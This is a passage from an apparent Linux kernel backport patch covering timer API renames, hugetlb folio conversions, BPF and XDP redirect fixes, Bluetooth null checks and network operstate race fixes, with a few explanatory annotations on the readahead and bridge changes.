++/**
++ * del_timer - Delete a pending timer
++ * @timer:	The timer to be deleted
++ *
++ * See timer_delete() for detailed explanation.
++ *
++ * Do not use in new code. Use timer_delete() instead.
++ */
++static inline int del_timer(struct timer_list *timer)
++{
++	return timer_delete(timer);
++}
+ 
+ extern void init_timers(void);
+ struct hrtimer;
+diff --git a/include/net/xfrm.h b/include/net/xfrm.h
+index 9ec6f2e92ad3a..5b9c2c535702c 100644
+--- a/include/net/xfrm.h
++++ b/include/net/xfrm.h
+@@ -1032,6 +1032,9 @@ struct xfrm_offload {
+ #define CRYPTO_INVALID_PACKET_SYNTAX		64
+ #define CRYPTO_INVALID_PROTOCOL			128
+ 
++	/* Used to keep whole l2 header for transport mode GRO */
++	__u32			orig_mac_len;
++
+ 	__u8			proto;
+ 	__u8			inner_ipproto;
+ };
+diff --git a/include/uapi/scsi/scsi_bsg_mpi3mr.h b/include/uapi/scsi/scsi_bsg_mpi3mr.h
+index fdc3517f9e199..c48c5d08c0fa0 100644
+--- a/include/uapi/scsi/scsi_bsg_mpi3mr.h
++++ b/include/uapi/scsi/scsi_bsg_mpi3mr.h
+@@ -382,7 +382,7 @@ struct mpi3mr_bsg_in_reply_buf {
+ 	__u8	mpi_reply_type;
+ 	__u8	rsvd1;
+ 	__u16	rsvd2;
+-	__u8	reply_buf[1];
++	__u8	reply_buf[];
+ };
+ 
+ /**
+diff --git a/kernel/bpf/bloom_filter.c b/kernel/bpf/bloom_filter.c
+index 48ee750849f25..78e810f49c445 100644
+--- a/kernel/bpf/bloom_filter.c
++++ b/kernel/bpf/bloom_filter.c
+@@ -88,6 +88,18 @@ static int bloom_map_get_next_key(struct bpf_map *map, void *key, void *next_key
+ 	return -EOPNOTSUPP;
+ }
+ 
++/* Called from syscall */
++static int bloom_map_alloc_check(union bpf_attr *attr)
++{
++	if (attr->value_size > KMALLOC_MAX_SIZE)
++		/* if value_size is bigger, the user space won't be able to
++		 * access the elements.
++		 */
++		return -E2BIG;
++
++	return 0;
++}
++
+ static struct bpf_map *bloom_map_alloc(union bpf_attr *attr)
+ {
+ 	u32 bitset_bytes, bitset_mask, nr_hash_funcs, nr_bits;
+@@ -196,6 +208,7 @@ static int bloom_map_check_btf(const struct bpf_map *map,
+ BTF_ID_LIST_SINGLE(bpf_bloom_map_btf_ids, struct, bpf_bloom_filter)
+ const struct bpf_map_ops bloom_filter_map_ops = {
+ 	.map_meta_equal = bpf_map_meta_equal,
++	.map_alloc_check = bloom_map_alloc_check,
+ 	.map_alloc = bloom_map_alloc,
+ 	.map_free = bloom_map_free,
+ 	.map_get_next_key = bloom_map_get_next_key,
+diff --git a/kernel/bpf/verifier.c b/kernel/bpf/verifier.c
+index 27cc6e3db5a86..18b3f429abe17 100644
+--- a/kernel/bpf/verifier.c
++++ b/kernel/bpf/verifier.c
+@@ -13177,8 +13177,7 @@ static int resolve_pseudo_ldimm64(struct bpf_verifier_env *env)
+ 			f = fdget(fd);
+ 			map = __bpf_map_get(f);
+ 			if (IS_ERR(map)) {
+-				verbose(env, "fd %d is not pointing to valid bpf_map\n",
+-					insn[0].imm);
++				verbose(env, "fd %d is not pointing to valid bpf_map\n", fd);
+ 				return PTR_ERR(map);
+ 			}
+ 
+diff --git a/kernel/time/timer.c b/kernel/time/timer.c
+index 59469897432bc..e09852be4e638 100644
+--- a/kernel/time/timer.c
++++ b/kernel/time/timer.c
+@@ -1255,7 +1255,7 @@ void add_timer_on(struct timer_list *timer, int cpu)
+ EXPORT_SYMBOL_GPL(add_timer_on);
+ 
+ /**
+- * del_timer - Deactivate a timer.
++ * timer_delete - Deactivate a timer
+  * @timer:	The timer to be deactivated
+  *
+  * The function only deactivates a pending timer, but contrary to
+@@ -1268,7 +1268,7 @@ EXPORT_SYMBOL_GPL(add_timer_on);
+  * * %0 - The timer was not pending
+  * * %1 - The timer was pending and deactivated
+  */
+-int del_timer(struct timer_list *timer)
++int timer_delete(struct timer_list *timer)
+ {
+ 	struct timer_base *base;
+ 	unsigned long flags;
+@@ -1284,7 +1284,7 @@ int del_timer(struct timer_list *timer)
+ 
+ 	return ret;
+ }
+-EXPORT_SYMBOL(del_timer);
++EXPORT_SYMBOL(timer_delete);
+ 
+ /**
+  * try_to_del_timer_sync - Try to deactivate a timer
+@@ -1963,7 +1963,7 @@ signed long __sched schedule_timeout(signed long timeout)
+ 	timer_setup_on_stack(&timer.timer, process_timeout, 0);
+ 	__mod_timer(&timer.timer, expire, MOD_TIMER_NOTPENDING);
+ 	schedule();
+-	del_singleshot_timer_sync(&timer.timer);
++	del_timer_sync(&timer.timer);
+ 
+ 	/* Remove the timer from the object tracker */
+ 	destroy_timer_on_stack(&timer.timer);
+diff --git a/lib/Kconfig.debug b/lib/Kconfig.debug
+index 95541b99aa8ea..b2dff19358938 100644
+--- a/lib/Kconfig.debug
++++ b/lib/Kconfig.debug
+@@ -343,7 +343,7 @@ config DEBUG_INFO_SPLIT
+ 	  Incompatible with older versions of ccache.
+ 
+ config DEBUG_INFO_BTF
+-	bool "Generate BTF typeinfo"
++	bool "Generate BTF type information"
+ 	depends on !DEBUG_INFO_SPLIT && !DEBUG_INFO_REDUCED
+ 	depends on !GCC_PLUGIN_RANDSTRUCT || COMPILE_TEST
+ 	depends on BPF_SYSCALL
+@@ -374,7 +374,8 @@ config PAHOLE_HAS_LANG_EXCLUDE
+ 	  using DEBUG_INFO_BTF_MODULES.
+ 
+ config DEBUG_INFO_BTF_MODULES
+-	def_bool y
++	bool "Generate BTF type information for kernel modules"
++	default y
+ 	depends on DEBUG_INFO_BTF && MODULES && PAHOLE_HAS_SPLIT_BTF
+ 	help
+ 	  Generate compact split BTF type information for kernel modules.
+diff --git a/lib/dynamic_debug.c b/lib/dynamic_debug.c
+index 009f2ead09c1e..939678ea930e0 100644
+--- a/lib/dynamic_debug.c
++++ b/lib/dynamic_debug.c
+@@ -301,7 +301,11 @@ static int ddebug_tokenize(char *buf, char *words[], int maxwords)
+ 		} else {
+ 			for (end = buf; *end && !isspace(*end); end++)
+ 				;
+-			BUG_ON(end == buf);
++			if (end == buf) {
++				pr_err("parse err after word:%d=%s\n", nwords,
++				       nwords ? words[nwords - 1] : "<none>");
++				return -EINVAL;
++			}
+ 		}
+ 
+ 		/* `buf' is start of word, `end' is one past its end */
+diff --git a/mm/hugetlb.c b/mm/hugetlb.c
+index 37288a7f0fa65..4361dcf70139f 100644
+--- a/mm/hugetlb.c
++++ b/mm/hugetlb.c
+@@ -1661,9 +1661,10 @@ static void __remove_hugetlb_page(struct hstate *h, struct page *page,
+ 							bool demote)
+ {
+ 	int nid = page_to_nid(page);
++	struct folio *folio = page_folio(page);
+ 
+-	VM_BUG_ON_PAGE(hugetlb_cgroup_from_page(page), page);
+-	VM_BUG_ON_PAGE(hugetlb_cgroup_from_page_rsvd(page), page);
++	VM_BUG_ON_FOLIO(hugetlb_cgroup_from_folio(folio), folio);
++	VM_BUG_ON_FOLIO(hugetlb_cgroup_from_folio_rsvd(folio), folio);
+ 
+ 	lockdep_assert_held(&hugetlb_lock);
+ 	if (hstate_is_gigantic(h) && !gigantic_page_runtime_supported())
+@@ -1761,7 +1762,6 @@ static void __update_and_free_page(struct hstate *h, struct page *page)
+ {
+ 	int i;
+ 	struct page *subpage;
+-	bool clear_dtor = HPageVmemmapOptimized(page);
+ 
+ 	if (hstate_is_gigantic(h) && !gigantic_page_runtime_supported())
+ 		return;
+@@ -1796,7 +1796,7 @@ static void __update_and_free_page(struct hstate *h, struct page *page)
+ 	 * If vmemmap pages were allocated above, then we need to clear the
+ 	 * hugetlb destructor under the hugetlb lock.
+ 	 */
+-	if (clear_dtor) {
++	if (PageHuge(page)) {
+ 		spin_lock_irq(&hugetlb_lock);
+ 		__clear_hugetlb_destructor(h, page);
+ 		spin_unlock_irq(&hugetlb_lock);
+@@ -1917,21 +1917,22 @@ void free_huge_page(struct page *page)
+ 	 * Can't pass hstate in here because it is called from the
+ 	 * compound page destructor.
+ 	 */
+-	struct hstate *h = page_hstate(page);
+-	int nid = page_to_nid(page);
+-	struct hugepage_subpool *spool = hugetlb_page_subpool(page);
++	struct folio *folio = page_folio(page);
++	struct hstate *h = folio_hstate(folio);
++	int nid = folio_nid(folio);
++	struct hugepage_subpool *spool = hugetlb_folio_subpool(folio);
+ 	bool restore_reserve;
+ 	unsigned long flags;
+ 
+-	VM_BUG_ON_PAGE(page_count(page), page);
+-	VM_BUG_ON_PAGE(page_mapcount(page), page);
++	VM_BUG_ON_FOLIO(folio_ref_count(folio), folio);
++	VM_BUG_ON_FOLIO(folio_mapcount(folio), folio);
+ 
+-	hugetlb_set_page_subpool(page, NULL);
+-	if (PageAnon(page))
+-		__ClearPageAnonExclusive(page);
+-	page->mapping = NULL;
+-	restore_reserve = HPageRestoreReserve(page);
+-	ClearHPageRestoreReserve(page);
++	hugetlb_set_folio_subpool(folio, NULL);
++	if (folio_test_anon(folio))
++		__ClearPageAnonExclusive(&folio->page);
++	folio->mapping = NULL;
++	restore_reserve = folio_test_hugetlb_restore_reserve(folio);
++	folio_clear_hugetlb_restore_reserve(folio);
+ 
+ 	/*
+ 	 * If HPageRestoreReserve was set on page, page allocation consumed a
+@@ -1953,15 +1954,15 @@ void free_huge_page(struct page *page)
+ 	}
+ 
+ 	spin_lock_irqsave(&hugetlb_lock, flags);
+-	ClearHPageMigratable(page);
+-	hugetlb_cgroup_uncharge_page(hstate_index(h),
+-				     pages_per_huge_page(h), page);
+-	hugetlb_cgroup_uncharge_page_rsvd(hstate_index(h),
+-					  pages_per_huge_page(h), page);
++	folio_clear_hugetlb_migratable(folio);
++	hugetlb_cgroup_uncharge_folio(hstate_index(h),
++				     pages_per_huge_page(h), folio);
++	hugetlb_cgroup_uncharge_folio_rsvd(hstate_index(h),
++					  pages_per_huge_page(h), folio);
+ 	if (restore_reserve)
+ 		h->resv_huge_pages++;
+ 
+-	if (HPageTemporary(page)) {
++	if (folio_test_hugetlb_temporary(folio)) {
+ 		remove_hugetlb_page(h, page, false);
+ 		spin_unlock_irqrestore(&hugetlb_lock, flags);
+ 		update_and_free_page(h, page, true);
+@@ -3080,6 +3081,7 @@ struct page *alloc_huge_page(struct vm_area_struct *vma,
+ 	struct hugepage_subpool *spool = subpool_vma(vma);
+ 	struct hstate *h = hstate_vma(vma);
+ 	struct page *page;
++	struct folio *folio;
+ 	long map_chg, map_commit;
+ 	long gbl_chg;
+ 	int ret, idx;
+@@ -3143,6 +3145,7 @@ struct page *alloc_huge_page(struct vm_area_struct *vma,
+ 	 * a reservation exists for the allocation.
+ 	 */
+ 	page = dequeue_huge_page_vma(h, vma, addr, avoid_reserve, gbl_chg);
++
+ 	if (!page) {
+ 		spin_unlock_irq(&hugetlb_lock);
+ 		page = alloc_buddy_huge_page_with_mpol(h, vma, addr);
+@@ -3157,6 +3160,7 @@ struct page *alloc_huge_page(struct vm_area_struct *vma,
+ 		set_page_refcounted(page);
+ 		/* Fall through */
+ 	}
++	folio = page_folio(page);
+ 	hugetlb_cgroup_commit_charge(idx, pages_per_huge_page(h), h_cg, page);
+ 	/* If allocation is not consuming a reservation, also store the
+ 	 * hugetlb_cgroup pointer on the page.
+@@ -3185,9 +3189,12 @@ struct page *alloc_huge_page(struct vm_area_struct *vma,
+ 
+ 		rsv_adjust = hugepage_subpool_put_pages(spool, 1);
+ 		hugetlb_acct_memory(h, -rsv_adjust);
+-		if (deferred_reserve)
+-			hugetlb_cgroup_uncharge_page_rsvd(hstate_index(h),
+-					pages_per_huge_page(h), page);
++		if (deferred_reserve) {
++			spin_lock_irq(&hugetlb_lock);
++			hugetlb_cgroup_uncharge_folio_rsvd(hstate_index(h),
++					pages_per_huge_page(h), folio);
++			spin_unlock_irq(&hugetlb_lock);
++		}
+ 	}
+ 	return page;
+ 
+diff --git a/mm/hugetlb_cgroup.c b/mm/hugetlb_cgroup.c
+index f61d132df52b3..32f4408eda240 100644
+--- a/mm/hugetlb_cgroup.c
++++ b/mm/hugetlb_cgroup.c
+@@ -191,8 +191,9 @@ static void hugetlb_cgroup_move_parent(int idx, struct hugetlb_cgroup *h_cg,
+ 	struct page_counter *counter;
+ 	struct hugetlb_cgroup *page_hcg;
+ 	struct hugetlb_cgroup *parent = parent_hugetlb_cgroup(h_cg);
++	struct folio *folio = page_folio(page);
+ 
+-	page_hcg = hugetlb_cgroup_from_page(page);
++	page_hcg = hugetlb_cgroup_from_folio(folio);
+ 	/*
+ 	 * We can have pages in active list without any cgroup
+ 	 * ie, hugepage with less than 3 pages. We can safely
+@@ -314,7 +315,7 @@ static void __hugetlb_cgroup_commit_charge(int idx, unsigned long nr_pages,
+ 	if (hugetlb_cgroup_disabled() || !h_cg)
+ 		return;
+ 
+-	__set_hugetlb_cgroup(page, h_cg, rsvd);
++	__set_hugetlb_cgroup(page_folio(page), h_cg, rsvd);
+ 	if (!rsvd) {
+ 		unsigned long usage =
+ 			h_cg->nodeinfo[page_to_nid(page)]->usage[idx];
+@@ -345,18 +346,18 @@ void hugetlb_cgroup_commit_charge_rsvd(int idx, unsigned long nr_pages,
+ /*
+  * Should be called with hugetlb_lock held
+  */
+-static void __hugetlb_cgroup_uncharge_page(int idx, unsigned long nr_pages,
+-					   struct page *page, bool rsvd)
++static void __hugetlb_cgroup_uncharge_folio(int idx, unsigned long nr_pages,
++					   struct folio *folio, bool rsvd)
+ {
+ 	struct hugetlb_cgroup *h_cg;
+ 
+ 	if (hugetlb_cgroup_disabled())
+ 		return;
+ 	lockdep_assert_held(&hugetlb_lock);
+-	h_cg = __hugetlb_cgroup_from_page(page, rsvd);
++	h_cg = __hugetlb_cgroup_from_folio(folio, rsvd);
+ 	if (unlikely(!h_cg))
+ 		return;
+-	__set_hugetlb_cgroup(page, NULL, rsvd);
++	__set_hugetlb_cgroup(folio, NULL, rsvd);
+ 
+ 	page_counter_uncharge(__hugetlb_cgroup_counter_from_cgroup(h_cg, idx,
+ 								   rsvd),
+@@ -366,27 +367,27 @@ static void __hugetlb_cgroup_uncharge_page(int idx, unsigned long nr_pages,
+ 		css_put(&h_cg->css);
+ 	else {
+ 		unsigned long usage =
+-			h_cg->nodeinfo[page_to_nid(page)]->usage[idx];
++			h_cg->nodeinfo[folio_nid(folio)]->usage[idx];
+ 		/*
+ 		 * This write is not atomic due to fetching usage and writing
+ 		 * to it, but that's fine because we call this with
+ 		 * hugetlb_lock held anyway.
+ 		 */
+-		WRITE_ONCE(h_cg->nodeinfo[page_to_nid(page)]->usage[idx],
++		WRITE_ONCE(h_cg->nodeinfo[folio_nid(folio)]->usage[idx],
+ 			   usage - nr_pages);
+ 	}
+ }
+ 
+-void hugetlb_cgroup_uncharge_page(int idx, unsigned long nr_pages,
+-				  struct page *page)
++void hugetlb_cgroup_uncharge_folio(int idx, unsigned long nr_pages,
++				  struct folio *folio)
+ {
+-	__hugetlb_cgroup_uncharge_page(idx, nr_pages, page, false);
++	__hugetlb_cgroup_uncharge_folio(idx, nr_pages, folio, false);
+ }
+ 
+-void hugetlb_cgroup_uncharge_page_rsvd(int idx, unsigned long nr_pages,
+-				       struct page *page)
++void hugetlb_cgroup_uncharge_folio_rsvd(int idx, unsigned long nr_pages,
++				       struct folio *folio)
+ {
+-	__hugetlb_cgroup_uncharge_page(idx, nr_pages, page, true);
++	__hugetlb_cgroup_uncharge_folio(idx, nr_pages, folio, true);
+ }
+ 
+ static void __hugetlb_cgroup_uncharge_cgroup(int idx, unsigned long nr_pages,
+@@ -888,13 +889,14 @@ void hugetlb_cgroup_migrate(struct page *oldhpage, struct page *newhpage)
+ 	struct hugetlb_cgroup *h_cg;
+ 	struct hugetlb_cgroup *h_cg_rsvd;
+ 	struct hstate *h = page_hstate(oldhpage);
++	struct folio *old_folio = page_folio(oldhpage);
+ 
+ 	if (hugetlb_cgroup_disabled())
+ 		return;
+ 
+ 	spin_lock_irq(&hugetlb_lock);
+-	h_cg = hugetlb_cgroup_from_page(oldhpage);
+-	h_cg_rsvd = hugetlb_cgroup_from_page_rsvd(oldhpage);
++	h_cg = hugetlb_cgroup_from_folio(old_folio);
++	h_cg_rsvd = hugetlb_cgroup_from_folio_rsvd(old_folio);
+ 	set_hugetlb_cgroup(oldhpage, NULL);
+ 	set_hugetlb_cgroup_rsvd(oldhpage, NULL);
+ 
+diff --git a/mm/migrate.c b/mm/migrate.c
+index c5968021fde0a..0252aa4ff572e 100644
+--- a/mm/migrate.c
++++ b/mm/migrate.c
+@@ -1632,7 +1632,7 @@ struct page *alloc_migration_target(struct page *page, unsigned long private)
+ 		nid = folio_nid(folio);
+ 
+ 	if (folio_test_hugetlb(folio)) {
+-		struct hstate *h = page_hstate(&folio->page);
++		struct hstate *h = folio_hstate(folio);
+ 
+ 		gfp_mask = htlb_modify_alloc_mask(h, gfp_mask);
+ 		return alloc_huge_page_nodemask(h, nid, mtc->nmask, gfp_mask);
+diff --git a/mm/readahead.c b/mm/readahead.c
+index e4b772bb70e68..794d8ddc06972 100644
+--- a/mm/readahead.c
++++ b/mm/readahead.c
+@@ -504,6 +504,7 @@ void page_cache_ra_order(struct readahead_control *ractl,
+ 	pgoff_t index = readahead_index(ractl);
+ 	pgoff_t limit = (i_size_read(mapping->host) - 1) >> PAGE_SHIFT;
+ 	pgoff_t mark = index + ra->size - ra->async_size;
++	unsigned int nofs;
+ 	int err = 0;
+ 	gfp_t gfp = readahead_gfp_mask(mapping);
+ 
+@@ -520,6 +521,8 @@ void page_cache_ra_order(struct readahead_control *ractl,
+ 			new_order--;
+ 	}
+ 
++	/* See comment in page_cache_ra_unbounded() */
++	nofs = memalloc_nofs_save();
+ 	filemap_invalidate_lock_shared(mapping);
+ 	while (index <= limit) {
+ 		unsigned int order = new_order;
+@@ -548,6 +551,7 @@ void page_cache_ra_order(struct readahead_control *ractl,
+ 
+ 	read_pages(ractl);
+ 	filemap_invalidate_unlock_shared(mapping);
++	memalloc_nofs_restore(nofs);
+ 
+ 	/*
+ 	 * If there were already pages in the page cache, then we may have
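
The readahead hunk above brackets the invalidate lock with a memalloc_nofs scope, so any allocation made while the lock is held is implicitly GFP_NOFS and cannot recurse into the filesystem. A minimal sketch of the pattern, with a hypothetical critical section:

#include <linux/sched/mm.h>

static void example_nofs_scope(void)
{
	unsigned int nofs;

	/* Every allocation inside this scope behaves as if GFP_NOFS were set. */
	nofs = memalloc_nofs_save();

	/* ... take fs-reclaim-sensitive locks and allocate pages ... */

	memalloc_nofs_restore(nofs);	/* restore the saved allocation flags */
}
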
+diff --git a/net/bluetooth/hci_core.c b/net/bluetooth/hci_core.c
+index 02e67ff05b7b4..d6be3cb86598e 100644
+--- a/net/bluetooth/hci_core.c
++++ b/net/bluetooth/hci_core.c
+@@ -2733,8 +2733,6 @@ void hci_unregister_dev(struct hci_dev *hdev)
+ 
+ 	hci_unregister_suspend_notifier(hdev);
+ 
+-	msft_unregister(hdev);
+-
+ 	hci_dev_do_close(hdev);
+ 
+ 	if (!test_bit(HCI_INIT, &hdev->flags) &&
+@@ -2788,6 +2786,7 @@ void hci_release_dev(struct hci_dev *hdev)
+ 	hci_discovery_filter_clear(hdev);
+ 	hci_blocked_keys_clear(hdev);
+ 	hci_codec_list_clear(&hdev->local_codecs);
++	msft_release(hdev);
+ 	hci_dev_unlock(hdev);
+ 
+ 	ida_simple_remove(&hci_index_ida, hdev->id);
+diff --git a/net/bluetooth/l2cap_core.c b/net/bluetooth/l2cap_core.c
+index b4cba55be5ad9..c34011113d4c5 100644
+--- a/net/bluetooth/l2cap_core.c
++++ b/net/bluetooth/l2cap_core.c
+@@ -435,6 +435,9 @@ static void l2cap_chan_timeout(struct work_struct *work)
+ 
+ 	BT_DBG("chan %p state %s", chan, state_to_string(chan->state));
+ 
++	if (!conn)
++		return;
++
+ 	mutex_lock(&conn->chan_lock);
+ 	/* __set_chan_timer() calls l2cap_chan_hold(chan) while scheduling
+ 	 * this work. No need to call l2cap_chan_hold(chan) here again.
+diff --git a/net/bluetooth/msft.c b/net/bluetooth/msft.c
+index bee6a4c656be4..076cf8bce4d9e 100644
+--- a/net/bluetooth/msft.c
++++ b/net/bluetooth/msft.c
+@@ -584,7 +584,7 @@ void msft_register(struct hci_dev *hdev)
+ 	hdev->msft_data = msft;
+ }
+ 
+-void msft_unregister(struct hci_dev *hdev)
++void msft_release(struct hci_dev *hdev)
+ {
+ 	struct msft_data *msft = hdev->msft_data;
+ 
+diff --git a/net/bluetooth/msft.h b/net/bluetooth/msft.h
+index 2a63205b377b7..fe538e9c91c01 100644
+--- a/net/bluetooth/msft.h
++++ b/net/bluetooth/msft.h
+@@ -14,7 +14,7 @@
+ 
+ bool msft_monitor_supported(struct hci_dev *hdev);
+ void msft_register(struct hci_dev *hdev);
+-void msft_unregister(struct hci_dev *hdev);
++void msft_release(struct hci_dev *hdev);
+ void msft_do_open(struct hci_dev *hdev);
+ void msft_do_close(struct hci_dev *hdev);
+ void msft_vendor_evt(struct hci_dev *hdev, void *data, struct sk_buff *skb);
+@@ -35,7 +35,7 @@ static inline bool msft_monitor_supported(struct hci_dev *hdev)
+ }
+ 
+ static inline void msft_register(struct hci_dev *hdev) {}
+-static inline void msft_unregister(struct hci_dev *hdev) {}
++static inline void msft_release(struct hci_dev *hdev) {}
+ static inline void msft_do_open(struct hci_dev *hdev) {}
+ static inline void msft_do_close(struct hci_dev *hdev) {}
+ static inline void msft_vendor_evt(struct hci_dev *hdev, void *data,
+diff --git a/net/bluetooth/sco.c b/net/bluetooth/sco.c
+index 4a6bf60f3e7aa..301cf802d32c4 100644
+--- a/net/bluetooth/sco.c
++++ b/net/bluetooth/sco.c
+@@ -84,6 +84,10 @@ static void sco_sock_timeout(struct work_struct *work)
+ 	struct sock *sk;
+ 
+ 	sco_conn_lock(conn);
++	if (!conn->hcon) {
++		sco_conn_unlock(conn);
++		return;
++	}
+ 	sk = conn->sk;
+ 	if (sk)
+ 		sock_hold(sk);
+diff --git a/net/bridge/br_forward.c b/net/bridge/br_forward.c
+index 4e3394a7d7d45..9661698e86e40 100644
+--- a/net/bridge/br_forward.c
++++ b/net/bridge/br_forward.c
+@@ -253,6 +253,7 @@ static void maybe_deliver_addr(struct net_bridge_port *p, struct sk_buff *skb,
+ {
+ 	struct net_device *dev = BR_INPUT_SKB_CB(skb)->brdev;
+ 	const unsigned char *src = eth_hdr(skb)->h_source;
++	struct sk_buff *nskb;
+ 
+ 	if (!should_deliver(p, skb))
+ 		return;
+@@ -261,12 +262,16 @@ static void maybe_deliver_addr(struct net_bridge_port *p, struct sk_buff *skb,
+ 	if (skb->dev == p->dev && ether_addr_equal(src, addr))
+ 		return;
+ 
+-	skb = skb_copy(skb, GFP_ATOMIC);
+-	if (!skb) {
++	__skb_push(skb, ETH_HLEN);
++	nskb = pskb_copy(skb, GFP_ATOMIC);
++	__skb_pull(skb, ETH_HLEN);
++	if (!nskb) {
+ 		DEV_STATS_INC(dev, tx_dropped);
+ 		return;
+ 	}
+ 
++	skb = nskb;
++	__skb_pull(skb, ETH_HLEN);
+ 	if (!is_broadcast_ether_addr(addr))
+ 		memcpy(eth_hdr(skb)->h_dest, addr, ETH_ALEN);
+ 
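
The bridge fix above replaces skb_copy() with pskb_copy() around a temporary header push: only the header portion is duplicated while paged fragments stay shared, and the (now warned-about) skb_copy() of fraglist GSO skbs is avoided. A sketch of the same push/copy/pull dance, with a hypothetical caller:

#include <linux/skbuff.h>
#include <linux/if_ether.h>

/* Hypothetical helper: copy an skb whose mac header has already been
 * pulled. pskb_copy() duplicates the header area and shares the paged
 * frags, unlike skb_copy() which duplicates everything.
 */
static struct sk_buff *example_copy_with_mac(struct sk_buff *skb)
{
	struct sk_buff *nskb;

	__skb_push(skb, ETH_HLEN);		/* expose the mac header */
	nskb = pskb_copy(skb, GFP_ATOMIC);	/* header copied, frags shared */
	__skb_pull(skb, ETH_HLEN);		/* restore the original skb */
	if (nskb)
		__skb_pull(nskb, ETH_HLEN);	/* match the caller's view */
	return nskb;
}
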
+diff --git a/net/bridge/br_netlink.c b/net/bridge/br_netlink.c
+index d38eff27767dc..e9e5c77ef0f4a 100644
+--- a/net/bridge/br_netlink.c
++++ b/net/bridge/br_netlink.c
+@@ -439,7 +439,8 @@ static int br_fill_ifinfo(struct sk_buff *skb,
+ 			  u32 filter_mask, const struct net_device *dev,
+ 			  bool getlink)
+ {
+-	u8 operstate = netif_running(dev) ? dev->operstate : IF_OPER_DOWN;
++	u8 operstate = netif_running(dev) ? READ_ONCE(dev->operstate) :
++					    IF_OPER_DOWN;
+ 	struct nlattr *af = NULL;
+ 	struct net_bridge *br;
+ 	struct ifinfomsg *hdr;
+diff --git a/net/core/filter.c b/net/core/filter.c
+index cb7c4651eaec8..1d8b271ef8cc2 100644
+--- a/net/core/filter.c
++++ b/net/core/filter.c
+@@ -4244,10 +4244,12 @@ static __always_inline int __xdp_do_redirect_frame(struct bpf_redirect_info *ri,
+ 	enum bpf_map_type map_type = ri->map_type;
+ 	void *fwd = ri->tgt_value;
+ 	u32 map_id = ri->map_id;
++	u32 flags = ri->flags;
+ 	struct bpf_map *map;
+ 	int err;
+ 
+ 	ri->map_id = 0; /* Valid map id idr range: [1,INT_MAX[ */
++	ri->flags = 0;
+ 	ri->map_type = BPF_MAP_TYPE_UNSPEC;
+ 
+ 	if (unlikely(!xdpf)) {
+@@ -4259,11 +4261,20 @@ static __always_inline int __xdp_do_redirect_frame(struct bpf_redirect_info *ri,
+ 	case BPF_MAP_TYPE_DEVMAP:
+ 		fallthrough;
+ 	case BPF_MAP_TYPE_DEVMAP_HASH:
+-		map = READ_ONCE(ri->map);
+-		if (unlikely(map)) {
++		if (unlikely(flags & BPF_F_BROADCAST)) {
++			map = READ_ONCE(ri->map);
++
++			/* The map pointer is cleared when the map is being torn
++			 * down by bpf_clear_redirect_map()
++			 */
++			if (unlikely(!map)) {
++				err = -ENOENT;
++				break;
++			}
++
+ 			WRITE_ONCE(ri->map, NULL);
+ 			err = dev_map_enqueue_multi(xdpf, dev, map,
+-						    ri->flags & BPF_F_EXCLUDE_INGRESS);
++						    flags & BPF_F_EXCLUDE_INGRESS);
+ 		} else {
+ 			err = dev_map_enqueue(fwd, xdpf, dev);
+ 		}
+@@ -4334,9 +4345,9 @@ EXPORT_SYMBOL_GPL(xdp_do_redirect_frame);
+ static int xdp_do_generic_redirect_map(struct net_device *dev,
+ 				       struct sk_buff *skb,
+ 				       struct xdp_buff *xdp,
+-				       struct bpf_prog *xdp_prog,
+-				       void *fwd,
+-				       enum bpf_map_type map_type, u32 map_id)
++				       struct bpf_prog *xdp_prog, void *fwd,
++				       enum bpf_map_type map_type, u32 map_id,
++				       u32 flags)
+ {
+ 	struct bpf_redirect_info *ri = this_cpu_ptr(&bpf_redirect_info);
+ 	struct bpf_map *map;
+@@ -4346,11 +4357,20 @@ static int xdp_do_generic_redirect_map(struct net_device *dev,
+ 	case BPF_MAP_TYPE_DEVMAP:
+ 		fallthrough;
+ 	case BPF_MAP_TYPE_DEVMAP_HASH:
+-		map = READ_ONCE(ri->map);
+-		if (unlikely(map)) {
++		if (unlikely(flags & BPF_F_BROADCAST)) {
++			map = READ_ONCE(ri->map);
++
++			/* The map pointer is cleared when the map is being torn
++			 * down by bpf_clear_redirect_map()
++			 */
++			if (unlikely(!map)) {
++				err = -ENOENT;
++				break;
++			}
++
+ 			WRITE_ONCE(ri->map, NULL);
+ 			err = dev_map_redirect_multi(dev, skb, xdp_prog, map,
+-						     ri->flags & BPF_F_EXCLUDE_INGRESS);
++						     flags & BPF_F_EXCLUDE_INGRESS);
+ 		} else {
+ 			err = dev_map_generic_redirect(fwd, skb, xdp_prog);
+ 		}
+@@ -4387,9 +4407,11 @@ int xdp_do_generic_redirect(struct net_device *dev, struct sk_buff *skb,
+ 	enum bpf_map_type map_type = ri->map_type;
+ 	void *fwd = ri->tgt_value;
+ 	u32 map_id = ri->map_id;
++	u32 flags = ri->flags;
+ 	int err;
+ 
+ 	ri->map_id = 0; /* Valid map id idr range: [1,INT_MAX[ */
++	ri->flags = 0;
+ 	ri->map_type = BPF_MAP_TYPE_UNSPEC;
+ 
+ 	if (map_type == BPF_MAP_TYPE_UNSPEC && map_id == INT_MAX) {
+@@ -4409,7 +4431,7 @@ int xdp_do_generic_redirect(struct net_device *dev, struct sk_buff *skb,
+ 		return 0;
+ 	}
+ 
+-	return xdp_do_generic_redirect_map(dev, skb, xdp, xdp_prog, fwd, map_type, map_id);
++	return xdp_do_generic_redirect_map(dev, skb, xdp, xdp_prog, fwd, map_type, map_id, flags);
+ err:
+ 	_trace_xdp_redirect_err(dev, xdp_prog, ri->tgt_index, err);
+ 	return err;
+diff --git a/net/core/link_watch.c b/net/core/link_watch.c
+index aa6cb1f90966f..13513efcfbfe8 100644
+--- a/net/core/link_watch.c
++++ b/net/core/link_watch.c
+@@ -53,7 +53,7 @@ static void rfc2863_policy(struct net_device *dev)
+ {
+ 	unsigned char operstate = default_operstate(dev);
+ 
+-	if (operstate == dev->operstate)
++	if (operstate == READ_ONCE(dev->operstate))
+ 		return;
+ 
+ 	write_lock(&dev_base_lock);
+@@ -73,7 +73,7 @@ static void rfc2863_policy(struct net_device *dev)
+ 		break;
+ 	}
+ 
+-	dev->operstate = operstate;
++	WRITE_ONCE(dev->operstate, operstate);
+ 
+ 	write_unlock(&dev_base_lock);
+ }
+diff --git a/net/core/net-sysfs.c b/net/core/net-sysfs.c
+index 8409d41405dfe..fdf3308b03350 100644
+--- a/net/core/net-sysfs.c
++++ b/net/core/net-sysfs.c
+@@ -306,11 +306,9 @@ static ssize_t operstate_show(struct device *dev,
+ 	const struct net_device *netdev = to_net_dev(dev);
+ 	unsigned char operstate;
+ 
+-	read_lock(&dev_base_lock);
+-	operstate = netdev->operstate;
